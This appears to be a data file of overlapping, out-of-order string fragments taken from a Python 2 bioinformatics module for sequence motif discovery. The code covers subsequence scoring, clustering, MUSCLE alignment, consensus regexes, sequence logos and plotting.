"self.b = popt else: logger.debug('Warning: reverting to default values') logger.debug('ECDF fit on %d",
"patches = plt.hist( locs, nbins, normed=0, facecolor='blue', alpha=0.3) plt.grid() plt.title(needle) plt.xlabel('Position') plt.ylabel('Num occurrences')",
"# kmers dont interfere cluster_seqs = [] for cluster_id in clusters: if len(clusters[cluster_id])",
"= motives[cluster_id]['regex_seq'] counts, freq = occurrences(regex_seq, seqs) motives[cluster_id]['freq'] = freq motives[cluster_id]['counts'] = counts",
"options = wbl.LogoOptions() options.stacks_per_line = stacks_per_line options.sequence_type = sequence_type options.ignore_lower_case = ignore_lower_case options.unit_name",
"clusters: if len(clusters[cluster_id]) > 0: seqs = [s for h, s in clusters[cluster_id]]",
"eden.util.iterated_maximum_subarray import compute_max_subarrays_sequence from itertools import izip import time from sklearn.base import BaseEstimator,",
"else: pool = mp.Pool(n_jobs) pos_results = [apply_async( pool, serial_pre_process, args=(seqs, vectorizer)) for seqs",
"time.time() pos_data_matrix = p.get() y = [1] * pos_data_matrix.shape[0] neg_data_matrix = n.get() y",
"dict() for cluster_id in motives: regex_seq = motives[cluster_id]['regex_seq'] counts, freq = occurrences(regex_seq, seqs)",
"TODO: check if this alphabet is required # it over-rides tool.alphabet alphabet='dna', #",
"2), fname=None): \"\"\"plot_distance.\"\"\" ds = distances[(cluster_id_i, cluster_id_j)] plt.figure(figsize=size) n, bins, patches = plt.hist(",
"\"\"\"compute_cooccurence.\"\"\" if ids is None: ids = [id for id in motives] seqs_summary",
"[] for letter, count in k: if count / float(size) > regex_th: if",
"figname = '%s_dist_%d_vs_%d.png' % (fname, cluster_id_i, cluster_id_j) plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0) else:",
"ys = np.arange(1, len(xs) + 1) / float(len(xs)) return xs, ys def letter_regex(k,",
"collections import defaultdict from eden import apply_async import numpy as np from scipy.sparse",
"plt.ylabel('Importance score') if fname: plt.draw() figname = '%s_importance.png' % (fname) plt.savefig( figname, bbox_inches='tight',",
"nbits=15) self.estimator = estimator self.class_estimator = class_estimator self.clusterer = clusterer self.clusterer_is_fit = False",
"for id1, id2 in c[:, 0:2]: if id1 < len(cluster_seqs): orders.append(int(id1)) if id2",
"subarrays_item = p.get() subarrays_items += subarrays_item d_time = time.time() - start_time d_loc_time =",
"s + (e - s) / 2 locs.append(m) plt.figure(figsize=size) n, bins, patches =",
"out = list(_fasta_to_fasta(stdout.split('\\n'))) motif_seqs = [''] * len(headers) for i in range(len(out[:-1]))[::2]: id",
"as re from collections import Counter from sklearn import metrics from eden.util.NeedlemanWunsh import",
"%s: %d' % \\ (cluster_id, regex_i, j, regex_j, len(ds)) txt.append(info) if len(ds): figname",
"vs %s' % (regex_i, regex_j)) plt.xlabel('Relative position') plt.ylabel('Num occurrences') if fname: plt.draw() figname",
"cumulative distribution function.\"\"\" xs = np.sort(x) ys = np.arange(1, len(xs) + 1) /",
"kmers dont interfere cluster_seqs = [] for cluster_id in clusters: if len(clusters[cluster_id]) >",
"' deleting: %d [%d is now #%d]' % \\ (j, i, n_i +",
"motives[cluster_id] if len(_motives) == 0: logger.warning('Quality filter is too strict. Ignoring filter.') return",
"and len(align_seqs) > min_cluster_size: consensus_seq = self._compute_consensus_seq(trimmed_align_seqs) regex_seq = consensus_regex(trimmed_align_seqs, regex_th) motif =",
"c_j): selected = c_i - c_j distances[(i, j)].append(selected) cooccurence_mtx = np.nan_to_num(cooccurence_mtx) orig_cooccurence_mtx =",
"if score >= min_score and len(align_seqs) > min_cluster_size: consensus_seq = self._compute_consensus_seq(trimmed_align_seqs) regex_seq =",
"smod, half_windw_size=7): \"\"\"trim_seqs.\"\"\" sig = cumulative_score(seqs, smod) val, start, end, width = max(box_decomposition(sig,",
"-1: pool = mp.Pool() else: pool = mp.Pool(n_jobs) pos_results = [apply_async( pool, serial_pre_process,",
"True dtime = time.time() - start_time logger.debug('...done in %.2f secs' % (dtime)) self.clusters",
"ma.transform(seqs=sample_seqs) score, trimmed_align_seqs = self._compute_score(align_seqs, min_freq=min_freq) if score >= min_score and len(align_seqs) >",
"mp.Pool(n_jobs) pos_results = [apply_async( pool, serial_pre_process, args=(seqs, vectorizer)) for seqs in chunks(pos_iterable, pos_block_size)]",
"score: %.2f' % \\ (i, n_i, j, n_j, rel_nw_score) info2 = ' deleting:",
"output_type='screen'): pwd = os.getcwd() url = pwd + '/' + fname txt =",
"for input sequences.\"\"\" # seperate headers headers, instances = [list(x) for x in",
"seqs in chunks(iterable, block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Annotating') start_time",
"begin, end = loc.split(':') begin = int(begin) end = int(end) subseq = header.split('<subseq>')[1]",
"\"\"\"plot_distance.\"\"\" ds = distances[(cluster_id_i, cluster_id_j)] plt.figure(figsize=size) n, bins, patches = plt.hist( ds, nbins,",
"return estimator def multiprocess_performance(pos_iterable, neg_iterable, vectorizer=None, estimator=None, pos_block_size=100, neg_block_size=100, n_jobs=-1): \"\"\"multiprocess_performance.\"\"\" start_time =",
"y return p_val def compute_clusters(self, seqs=None, p_value=0.05): \"\"\"compute_clusters.\"\"\" try: subsequences = [] iterable",
"x in zip(*seqs)] instances_seqrecord = [] for i, j in enumerate(instances): instances_seqrecord.append( SeqRecord(Seq(j,",
"freq motives[cluster_id]['counts'] = counts avg, std = extract_location(regex_seq, seqs) motives[cluster_id]['avg_pos'] = avg motives[cluster_id]['std_pos']",
"+ half_windw_size]) if min_sig == sig[i]: yield i def box_decomposition(sig, half_windw_size=5): \"\"\"box_decomposition.\"\"\" ids",
"for seq, score in annotated_seqs] return scores def multiprocess_score(iterable, vectorizer=None, estimator=None, block_size=100, n_jobs=-1):",
"2 * nw_score / (len(seq_i) + len(seq_j)) if rel_nw_score > similarity_th: yield rel_nw_score,",
"= c.most_common() if k[0][0] == '-': to_be_removed.append(i) val = k[1][1] else: val =",
"instance j from any instance in i d_ij = [] for c_i in",
"exc_info=True) def _decompose_header(self, header): score = header.split('<score>')[1] score = float(score) loc = header.split('<loc>')[1]",
"% len(_motives)) return _motives def select_motives(self, seqs=None, p_value=0.05, similarity_th=0.5, min_score=4, min_freq=0.5, min_cluster_size=10, regex_th=.3,",
"return aligned_seqs # ------------------------------------------------------------------------------ class Weblogo(object): \"\"\"A wrapper of weblogolib for creating sequence.\"\"\"",
"'classic' wb = Weblogo(output_format='png', sequence_type=alphabet, resolution=200, stacks_per_line=60, units='bits', color_scheme=color_scheme) logo_image = wb.create_logo(seqs=motif['trimmed_align_seqs']) logo_txt",
"if len(matches): yield 1 else: yield 0 def occurrences(needle, haystack): \"\"\"occurrences.\"\"\" counts =",
"true_targets.append(y) data_matrix = vstack([pos_data_matrix, neg_data_matrix]) pred = estimator.decision_function(data_matrix) preds.append(pred) binary_pred = estimator.predict(data_matrix) binary_preds.append(binary_pred)",
"self.a, self.b = -4, 1 scores = [score for header, score, begin, end,",
"cooccurence_mtx[i, j] += 1 if i != j: # find closest instance j",
"\\ (cluster_id, regex_i, j, regex_j, len(ds)) txt.append(info) if len(ds): figname = plot_distance( cluster_id,",
"n_jobs=self.n_jobs) for header, seq in subarrays_items: yield self._decompose_header(header) except Exception as e: logger.debug('Failed",
"= [] for i, row in enumerate(cooccurence_mtx): norm = row[i] if norm !=",
"args=(seqs, vectorizer, estimator)) for seqs in chunks(iterable, block_size)] logger.debug('Setup %.2f secs' % (time.time()",
"motives[cluster_id]['std_pos'] = std if freq_th is None or freq >= freq_th: if std_th",
"fname=fname) txt.append(self._wrap_image(figname, output_type=output_type)) for j in motives: regex_i = motives[i]['regex_seq'] if j !=",
"+= 1 if i != j: # find closest instance j from any",
"orig_header, score, begin, end, subseq = components p = self.compute_p_value(score) if p <=",
"# join all sequences in a cluster with enough space that # kmers",
"= np.percentile(locs, 50) std_loc = np.percentile(locs, 70) - np.percentile(locs, 30) else: avg_loc =",
"len(motives)) return motives def quality_filter(self, seqs=None, motives=None, freq_th=None, std_th=None): \"\"\"quality_filter.\"\"\" _motives = dict()",
"row in enumerate(cluster.T): c = Counter(row) k = c.most_common() seq += k[0][0] return",
"line[0] == '>': if seq: yield seq seq = \"\" line_str = str(line)",
"motif_corebio = SeqList(alist=instances, alphabet=alphabet) data = wbl.LogoData().from_seqs(motif_corebio) format = wbl.LogoFormat(data, self.options) if self.output_format",
"min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"merge.\"\"\" while True: ms = sorted([m for m in self._identify_mergeable_clusters(",
"== '-': to_be_removed.append(i) val = k[1][1] else: val = k[0][1] if float(val) /",
"motif['consensus_seq'] logo_txt.append(info) info = ' - consensus regex: %s' % motif['regex_seq'] logo_txt.append(info) return",
"pool, serial_score, args=(seqs, vectorizer, estimator)) for seqs in chunks(iterable, block_size)] logger.debug('Setup %.2f secs'",
"self._compute_consensus_seq(trimmed_align_seqs) regex_seq = consensus_regex(trimmed_align_seqs, regex_th) motif = {'consensus_seq': consensus_seq, 'regex_seq': regex_seq, 'trimmed_align_seqs': trimmed_align_seqs,",
"motives = self.merge( motives, similarity_th=similarity_th, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) motives = self.quality_filter(",
"size=size, fname=fname) txt.append(self._wrap_image(figname, output_type=output_type)) for freq, cluster_id in sorted([(motives[i]['freq'], i) for i in",
"the empirical cumulative distribution.\"\"\" def __init__(self, random_state=1): \"\"\"Constructor.\"\"\" self.random_state = random_state self.a =",
"Alignment on sequences.\"\"\" def __init__(self, diags=False, maxiters=16, maxhours=None, # TODO: check if this",
"is None or std <= std_th: _motives[cluster_id] = motives[cluster_id] if len(_motives) == 0:",
"- start_time)) logger.debug('Vectorizing') start_time = time.time() matrices = [] for i, p in",
"i not in to_be_removed] trimmed_align_seqs.append((h, ''.join(trimmed_align_seq))) return score, trimmed_align_seqs def _is_high_quality(self, seqs, min_score=4,",
"sequence_type=alphabet, resolution=200, stacks_per_line=60, units='bits', color_scheme=color_scheme) logo_image = wb.create_logo(seqs=motif['trimmed_align_seqs']) logo_txt = [] info =",
"instances = [list(x) for x in zip(*seqs)] if self.options.sequence_type is 'rna': alphabet =",
"import SeqIO from Bio.Align.Applications import MuscleCommandline from Bio.Alphabet import IUPAC from Bio.Seq import",
"zip(preds, subsequences): self.clusters[pred].append(seq) logger.debug('After clustering, %d motives' % len(self.clusters)) return self.clusters except Exception",
"= [] iterable = self.decompose(seqs, p_value=p_value) for header, begin, end, p, subseq in",
"logo_txt) return logos else: logger.warning( 'No logo to compute. Try more permissive parameters.')",
"min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) motives = self.quality_filter( seqs, motives, freq_th=freq_th, std_th=std_th) return motives",
"\\ (j, i, n_i + n_j) logger.debug(info1 + info2) # update motives motives[i]",
"logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def _decompose_header(self, header): score =",
"' - num co-occurences %d %s vs %d %s: %d' % \\ (cluster_id,",
"ids: for h, s in motives[i]['seqs']: tokens = h.split('<loc>') seq_id = tokens[0] begin,",
"(orig_header, orig_seq), (seq, score) in zip(iterable, annotated_seqs): subarrays = compute_max_subarrays_sequence( seq=seq, score=score, min_subarray_size=min_subarray_size,",
"len(subsequences)) n = multiprocessing.cpu_count() pos_block_size = len(subsequences) / n data_matrix = multiprocess_vectorize( subsequences,",
"import SGDClassifier from sklearn.cluster import MiniBatchKMeans from eden.sequence import Vectorizer from StringIO import",
"np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster) size = len(trimmed_align_seqs) for i, row in",
"min_freq=min_freq, min_cluster_size=mcs, regex_th=regex_th, sample_size=sample_size) if is_high_quality: motives[cluster_id] = motif dtime = time.time() -",
"% len(motif['seqs']) logo_txt.append(info) info = ' - consensus sequence: %s' % motif['consensus_seq'] logo_txt.append(info)",
"score, begin, end, subseq in self.decomposition_scores(seqs)] if scores: xs, ys = ecdf(scores) popt,",
"[] for subarray in subarrays: subseq_seq = subarray['subarray_string'] begin = subarray['begin'] end =",
"'\"></p>') return '\\n'.join(txt) def report(self, pos_seqs, all_seqs, motives, nbins=40, size=(17, 2), output_type='screen', fname=None):",
"size, regex_th=0.3): \"\"\"letter_regex.\"\"\" code = [] for letter, count in k: if count",
"for id in motives) + 1 cooccurence_mtx = np.zeros((size, size)) for seq_id in",
"(i, size, d_time, d_loc_time)) pool.close() pool.join() return estimator def multiprocess_performance(pos_iterable, neg_iterable, vectorizer=None, estimator=None,",
"(len(seq_i) + len(seq_j)) if rel_nw_score > similarity_th: yield rel_nw_score, i, j def merge(self,",
"y_label options.yaxis_tic_interval = y_axis_tic_spacing options.show_ends = show_ends options.color_scheme = wbl.std_color_schemes[color_scheme] options.resolution = resolution",
"yield line_str.strip() else: line_str = line.split() if line_str: seq += str(line_str[0]).strip() if seq:",
"motives: c_regex = consensus_regex(motives[id]['trimmed_align_seqs'], regex_th) counts, freq = occurrences(c_regex, seqs) yield freq, id,",
"len(align_seqs) > min_cluster_size: return True else: return False def compute_motif(self, seqs=None, min_score=4, min_freq=0.6,",
"return p_val def compute_clusters(self, seqs=None, p_value=0.05): \"\"\"compute_clusters.\"\"\" try: subsequences = [] iterable =",
"= 0 to_be_removed = [] for i, row in enumerate(cluster.T): c = Counter(row)",
"%.2f)' % (i, size, d_time, d_loc_time)) pool.close() pool.join() preds = np.hstack(preds) binary_preds =",
"[a for i, a in enumerate(align_seq) if i not in to_be_removed] trimmed_align_seqs.append((h, ''.join(trimmed_align_seq)))",
"in hits(motives, ids=ids): seqs_summary[seq_id].append((begin, end, i)) distances = defaultdict(list) size = max(id for",
"if k[0][0] == '-': to_be_removed.append(i) val = k[1][1] else: val = k[0][1] if",
"if line: if line[0] == '>': if seq: yield seq seq = \"\"",
"freq_th=None, std_th=None): \"\"\"quality_filter.\"\"\" _motives = dict() for cluster_id in motives: regex_seq = motives[cluster_id]['regex_seq']",
"resolution=200, stacks_per_line=60, units='bits', color_scheme=color_scheme) logo_image = wb.create_logo(seqs=motif['trimmed_align_seqs']) logo_txt = [] info = '",
"+ url + '\" style=\"width: 100%\"></p>') else: txt.append('<p align=\"left\"><img src=\"' + fname +",
"subarray in subarrays: subseq_seq = subarray['subarray_string'] begin = subarray['begin'] end = subarray['end'] score",
"iterable = iter(iterable) while True: items = [] for i in range(n): it",
"- c_j distances[(i, j)].append(selected) cooccurence_mtx = np.nan_to_num(cooccurence_mtx) orig_cooccurence_mtx = cooccurence_mtx.copy() cooccurence_list = []",
"regex_j)) plt.xlabel('Relative position') plt.ylabel('Num occurrences') if fname: plt.draw() figname = '%s_dist_%d_vs_%d.png' % (fname,",
"is_high_quality, motif = self.compute_motif( seqs=seqs, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) if is_high_quality: info1",
"- np.percentile(locs, 30) else: avg_loc = -1 std_loc = 0 return avg_loc, std_loc",
"def _fasta_to_fasta(lines): seq = \"\" for line in lines: if line: if line[0]",
"= Alphabet('AGCT') motif_corebio = SeqList(alist=instances, alphabet=alphabet) data = wbl.LogoData().from_seqs(motif_corebio) format = wbl.LogoFormat(data, self.options)",
"subarrays: %d' % len(motif['seqs']) logo_txt.append(info) info = ' - consensus sequence: %s' %",
"fill_width: if output_type == 'pdf': txt.append('<p align=\"left\"><img src=\"file://' + url + '\" style=\"width:",
"src=\"' + fname + '\"></p>') return '\\n'.join(txt) def report(self, pos_seqs, all_seqs, motives, nbins=40,",
"position') plt.ylabel('Num occurrences') if fname: plt.draw() figname = '%s_dist_%d_vs_%d.png' % (fname, cluster_id_i, cluster_id_j)",
"= vectorizer.annotate(iterable, estimator=estimator) subarrays_items = [] for (orig_header, orig_seq), (seq, score) in zip(iterable,",
"match in re.finditer(needle, s): s = match.start() e = match.end() m = s",
"else: val = k[0][1] if float(val) / dim >= min_freq: score += 1",
"p_value=p_value) for header, begin, end, p, subseq in iterable: new_header = header new_header",
"match.start() e = match.end() m = s + (e - s) / 2",
"color='g') sign = np.copy(sig) sign[sign >= 0] = 0 plt.bar(range(len(sign)), sign, alpha=0.3, color='r')",
"distances, nbins=5, size=(6, 2), fname=None): \"\"\"plot_distance.\"\"\" ds = distances[(cluster_id_i, cluster_id_j)] plt.figure(figsize=size) n, bins,",
"max(box_decomposition(sig, half_windw_size)) logger.debug('val:%.1f beg:%s end:%s width:%s' % (val, start, end, width)) for h,",
"def __init__(self, complexity=5, n_clusters=10, min_subarray_size=4, max_subarray_size=10, estimator=SGDClassifier(warm_start=True), class_estimator=SGDClassifier(), clusterer=MiniBatchKMeans(), pos_block_size=300, neg_block_size=300, n_jobs=-1): \"\"\"Construct.\"\"\"",
"= '%s_dist_%d_vs_%d.png' % (fname, cluster_id_i, cluster_id_j) plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0) else: figname",
"regex_i, all_seqs, cluster_id=cluster_id, nbins=nbins, size=size, fname=fname) txt.append(self._wrap_image(figname, output_type=output_type)) for j in motives: regex_i",
"(#%d) score: %.2f' % \\ (i, n_i, j, n_j, rel_nw_score) info2 = '",
"width:%s' % (val, start, end, width)) for h, s in seqs: if s[start:end]:",
"reverse=True): info = '#### Motif id: %d' % cluster_id txt.append(info) logo_image, logo_txts =",
"__init__(self, random_state=1): \"\"\"Constructor.\"\"\" self.random_state = random_state self.a = -4 self.b = 1 def",
"cumulative_score(seqs, smod) plt.figure(figsize=size) sigp = np.copy(sig) sigp[sigp < 0] = 0 plt.bar(range(len(sigp)), sigp,",
"figname = '%s_importance.png' % (fname) plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0) else: figname =",
"return sig def trim_seqs(seqs, smod, half_windw_size=7): \"\"\"trim_seqs.\"\"\" sig = cumulative_score(seqs, smod) val, start,",
"fname=fname) txt.append(self._wrap_image(figname, output_type=output_type)) for freq, cluster_id in sorted([(motives[i]['freq'], i) for i in motives],",
"info = '#### Motif id: %d' % cluster_id txt.append(info) logo_image, logo_txts = self.compute_logo(",
"facecolor='blue', alpha=0.3) plt.grid() plt.title(needle) plt.xlabel('Position') plt.ylabel('Num occurrences') if fname: plt.draw() figname = '%s_loc_%d.png'",
"sample_size=200): \"\"\"merge.\"\"\" while True: ms = sorted([m for m in self._identify_mergeable_clusters( motives, similarity_th=similarity_th)],",
"motives, regex_th): \"\"\"extract_consensus.\"\"\" for id in motives: c_regex = consensus_regex(motives[id]['trimmed_align_seqs'], regex_th) counts, freq",
"= time.time() if n_jobs == -1: pool = mp.Pool() else: pool = mp.Pool(n_jobs)",
"orig_clusters, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) motives = self.merge( motives, similarity_th=similarity_th, min_score=min_score, min_freq=min_freq,",
"\"\"\"SequenceMotifDecomposer is a motif finder algorithm. @author: <NAME> @email: <EMAIL> \"\"\" import logging",
"+ n_j) logger.debug(info1 + info2) # update motives motives[i] = motif del motives[j]",
"* (complexity * 2) # join all sequences in a cluster with enough",
"\"\" line_str = str(line) yield line_str.strip() else: line_str = line.split() if line_str: seq",
"''.join(trimmed_align_seq))) return score, trimmed_align_seqs def _is_high_quality(self, seqs, min_score=4, min_freq=0.6, min_cluster_size=10, sample_size=200): ma =",
"= time.time() - start_time logger.debug( 'Cluster %d (#%d) (%.2f secs)' % (cluster_id, len(clusters[cluster_id]),",
"align=\"left\"><img src=\"' + fname + '\"></p>') return '\\n'.join(txt) def report(self, pos_seqs, all_seqs, motives,",
"_identify_mergeable_clusters(self, motives, similarity_th=0.8): for i in motives: for j in motives: if j",
"logo_txt.append(info) info = ' - consensus regex: %s' % motif['regex_seq'] logo_txt.append(info) return logo_image,",
"= ' - consensus regex: %s' % motif['regex_seq'] logo_txt.append(info) return logo_image, logo_txt def",
"if len(clusters[cluster_id]) > 0: seqs = [s for h, s in clusters[cluster_id]] seq",
"min_freq=0.5, min_cluster_size=10, regex_th=.3, sample_size=200, freq_th=None, std_th=None): \"\"\"select_motives.\"\"\" orig_clusters = self.compute_clusters(seqs, p_value=p_value) motives =",
"'<loc>%d:%d<loc>' % (begin, end) header += '<score>%.4f<score>' % (score) header += '<subseq>%s<subseq>' %",
"fineprint='', ): \"\"\"Initialize an instance.\"\"\" options = wbl.LogoOptions() options.stacks_per_line = stacks_per_line options.sequence_type =",
"secs)' % (cluster_id, len(clusters[cluster_id]), dtime)) logger.debug('After motives computation, %d motives' % len(motives)) return",
"p = self.compute_p_value(score) if p <= p_value: yield orig_header, begin, end, p, subseq",
"enough space that # kmers dont interfere cluster_seqs = [] for cluster_id in",
"if n_jobs == -1: pool = mp.Pool() else: pool = mp.Pool(n_jobs) pos_results =",
"numpy as np from scipy.sparse import vstack from eden.util.iterated_maximum_subarray import compute_max_subarrays_sequence from itertools",
"= np.array([1, -1]) if n_jobs == -1: pool = mp.Pool() else: pool =",
"scores def multiprocess_score(iterable, vectorizer=None, estimator=None, block_size=100, n_jobs=-1): \"\"\"multiprocess_score.\"\"\" start_time = time.time() if n_jobs",
"def score(self, seqs=None): \"\"\"fit.\"\"\" try: for score in multiprocess_score(seqs, vectorizer=self.vectorizer, estimator=self.estimator, block_size=self.pos_block_size, n_jobs=self.n_jobs):",
"smod): \"\"\"cumulative_score.\"\"\" median_len = np.median([len(s) for h, s in seqs]) sigs = None",
"self.alphabet = IUPAC.protein elif alphabet == 'rna': self.alphabet = IUPAC.unambiguous_rna else: self.alphabet =",
"size = max(id for id in motives) + 1 cooccurence_mtx = np.zeros((size, size))",
"locs: avg_loc = np.percentile(locs, 50) std_loc = np.percentile(locs, 70) - np.percentile(locs, 30) else:",
"= extract_location(regex_seq, seqs) motives[cluster_id]['avg_pos'] = avg motives[cluster_id]['std_pos'] = std if freq_th is None",
"StringIO import StringIO from Bio import SeqIO from Bio.Align.Applications import MuscleCommandline from Bio.Alphabet",
"time.time() pos_data_matrix = p.get() matrices += pos_data_matrix d_time = time.time() - start_time d_loc_time",
"occurrences') if fname: plt.draw() figname = '%s_dist_%d_vs_%d.png' % (fname, cluster_id_i, cluster_id_j) plt.savefig( figname,",
"preds, binary_preds, true_targets def serial_subarray(iterable, vectorizer=None, estimator=None, min_subarray_size=5, max_subarray_size=10): \"\"\"serial_subarray.\"\"\" annotated_seqs = vectorizer.annotate(iterable,",
"self.estimator = estimator self.class_estimator = class_estimator self.clusterer = clusterer self.clusterer_is_fit = False def",
"location: %.1f +- %.1f' % (av, st) txt.append(info) txt.append(self._wrap_image(figname, fill_width=False, output_type=output_type)) regex_i =",
"= motives[j]['regex_seq'] ds = distances[(cluster_id, j)] info = ' - num co-occurences %d",
"= np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster) size = len(trimmed_align_seqs) for i, row",
"alignment.\"\"\" headers, data = self._seq_to_stdin_fasta(seqs) stdout = self._perform_ma(data) aligned_seqs = self._fasta_to_seqs(headers, stdout) return",
"logging import multiprocessing as mp import os from collections import defaultdict from eden",
"Exception('No subarray was selected. Increase p_value.') logger.debug('Working on: %d fragments' % len(subsequences)) n",
"linkage import regex as re from collections import Counter from sklearn import metrics",
"= self._compute_consensus_seq(trimmed_align_seqs) regex_seq = consensus_regex(trimmed_align_seqs, regex_th) motif = {'consensus_seq': consensus_seq, 'regex_seq': regex_seq, 'trimmed_align_seqs':",
"cluster with enough space that # kmers dont interfere cluster_seqs = [] for",
"cluster = [] for h, align_seq in trimmed_align_seqs: str_list = [c for c",
"scores: xs, ys = self.ecdf(scores) popt, pcov = curve_fit(sigmoid, xs, ys) self.a, self.b",
"len(motives)) return motives def _identify_mergeable_clusters(self, motives, similarity_th=0.8): for i in motives: for j",
"mp.Pool() else: pool = mp.Pool(n_jobs) results = [apply_async( pool, serial_subarray, args=(seqs, vectorizer, estimator,",
"import MiniBatchKMeans from eden.sequence import Vectorizer from StringIO import StringIO from Bio import",
"scores = [score for header, score, begin, end, subseq in self.decomposition_scores(seqs)] if scores:",
"%s' % e) logger.debug('Exception', exc_info=True) def performance(self, pos_seqs=None, neg_seqs=None): \"\"\"performance.\"\"\" try: y_pred, y_binary,",
"raise Exception('No subarray was selected. Increase p_value.') logger.debug('Working on: %d fragments' % len(subsequences))",
"+= [-1] * neg_data_matrix.shape[0] y = np.array(y) data_matrix = vstack([pos_data_matrix, neg_data_matrix]) estimator.partial_fit(data_matrix, y,",
"to compute. Try more permissive parameters.') def _save_logo(self, logo, cluster_id, fname): imagename =",
"id = int(out[i].split(' ')[0].split('>')[1]) motif_seqs[id] = out[i + 1] return zip(headers, motif_seqs) def",
"return wbl.png_formatter(data, format) elif self.output_format == 'png_print': return wbl.png_print_formatter(data, format) elif self.output_format ==",
"c[:, 0:2]: if id1 < len(cluster_seqs): orders.append(int(id1)) if id2 < len(cluster_seqs): orders.append(int(id2)) return",
"d_time, d_loc_time)) pool.close() pool.join() return scores_items # ------------------------------------------------------------------------------ def _fasta_to_fasta(lines): seq = \"\"",
"pos_data_matrix = p.get() y = [1] * pos_data_matrix.shape[0] neg_data_matrix = n.get() y +=",
"elif self.output_format == 'png_print': return wbl.png_print_formatter(data, format) elif self.output_format == 'jpeg': return wbl.jpeg_formatter(data,",
"in ids: for h, s in motives[i]['seqs']: tokens = h.split('<loc>') seq_id = tokens[0]",
"seqs=None, p_value=0.05): \"\"\"decomposition_scores.\"\"\" try: subarrays_items = multiprocess_subarray( seqs, vectorizer=self.vectorizer, estimator=self.estimator, min_subarray_size=self.min_subarray_size, max_subarray_size=self.max_subarray_size, block_size=self.pos_block_size,",
"'protein': alphabet = Alphabet('ACDEFGHIKLMNPQRSTVWY') else: alphabet = Alphabet('AGCT') motif_corebio = SeqList(alist=instances, alphabet=alphabet) data",
"regex: %s' % motif['regex_seq'] logo_txt.append(info) return logo_image, logo_txt def compute_logos(self, motives, ids=None): \"\"\"compute_logos.\"\"\"",
"!= j: # find closest instance j from any instance in i d_ij",
"= len(subsequences) / n data_matrix = multiprocess_vectorize( subsequences, vectorizer=self.vectorizer, pos_block_size=pos_block_size, n_jobs=self.n_jobs) logger.debug('Clustering') logger.debug('working",
"to perform Muscle Alignment on sequences.\"\"\" def __init__(self, diags=False, maxiters=16, maxhours=None, # TODO:",
"+ '<loc>' subsequences.append((new_header, subseq)) if not subsequences: raise Exception('No subarray was selected. Increase",
"MuscleAlignWrapper(alphabet='rna') if len(seqs) > sample_size: sample_seqs = random.sample(seqs, sample_size) else: sample_seqs = seqs",
"pos_data_matrix.shape[0] neg_data_matrix = n.get() y += [-1] * neg_data_matrix.shape[0] y = np.array(y) data_matrix",
"= handle.getvalue() return headers, data def _perform_ma(self, data): params = {'maxiters': 7} if",
"0 def occurrences(needle, haystack): \"\"\"occurrences.\"\"\" counts = sum(find_occurrences(needle, haystack)) size = len(haystack) return",
"0: seqs = [s for h, s in clusters[cluster_id]] seq = sep.join(seqs) cluster_seqs.append(seq)",
"time.time() - start_time logger.debug('...done in %.2f secs' % (dtime)) self.clusters = defaultdict(list) for",
"mean_shift_decomposition(sig, half_windw_size=5): \"\"\"mean_shift_decomposition.\"\"\" sig_len = len(sig) for i in range(half_windw_size, sig_len - half_windw_size):",
"if scores: xs, ys = ecdf(scores) popt, pcov = curve_fit(sigmoid, xs, ys) self.a,",
"vectorizer=None, estimator=None): \"\"\"serial_score.\"\"\" annotated_seqs = vectorizer.annotate(iterable, estimator=estimator) scores = [score for seq, score",
"= motives[cluster_id]['std_pos'] info = ' - average location: %.1f +- %.1f' % (av,",
"n, bins, patches = plt.hist( ds, nbins, normed=0, facecolor='green', alpha=0.3) plt.grid() plt.title('%s vs",
"%s' % e) logger.debug('Exception', exc_info=True) def _decompose_header(self, header): score = header.split('<score>')[1] score =",
"1 else: yield 0 def occurrences(needle, haystack): \"\"\"occurrences.\"\"\" counts = sum(find_occurrences(needle, haystack)) size",
"' - average location: %.1f +- %.1f' % (av, st) txt.append(info) txt.append(self._wrap_image(figname, fill_width=False,",
"for seq_id, begin, end, i in hits(motives, ids=ids): seqs_summary[seq_id].append((begin, end, i)) distances =",
"SGDClassifier from sklearn.cluster import MiniBatchKMeans from eden.sequence import Vectorizer from StringIO import StringIO",
"c_i in centers[i]: for c_j in centers[j]: if selected_abs == abs(c_i - c_j):",
"txt.append('<p align=\"left\"><img src=\"' + fname + '\" style=\"width: 100%\"></p>') else: if output_type ==",
"complexity self.n_clusters = n_clusters self.min_subarray_size = min_subarray_size self.max_subarray_size = max_subarray_size self.pos_block_size = pos_block_size",
"n_jobs=-1): \"\"\"Construct.\"\"\" self.complexity = complexity self.n_clusters = n_clusters self.min_subarray_size = min_subarray_size self.max_subarray_size =",
"linkage(gram_matrix, method='single') orders = [] for id1, id2 in c[:, 0:2]: if id1",
"in motives: for j in motives: if j > i: seq_i = motives[i]['consensus_seq']",
"data def _perform_ma(self, data): params = {'maxiters': 7} if self.diags is True: params['diags']",
"txt.append('_' * 100) else: logger.warning( 'No motives to report. Try more permissive parameters.')",
"subarrays_items def multiprocess_subarray(iterable, vectorizer=None, estimator=None, min_subarray_size=5, max_subarray_size=10, block_size=100, n_jobs=-1): \"\"\"multiprocess_subarray.\"\"\" start_time = time.time()",
"line_str = str(line) yield line_str.strip() else: line_str = line.split() if line_str: seq +=",
"alpha=0.3) plt.grid() plt.title('%s vs %s' % (regex_i, regex_j)) plt.xlabel('Relative position') plt.ylabel('Num occurrences') if",
"logger.debug('Alignment') motives = dict() for cluster_id in clusters: start_time = time.time() # align",
"Counter(row) k = c.most_common() if k[0][0] == '-': to_be_removed.append(i) val = k[1][1] else:",
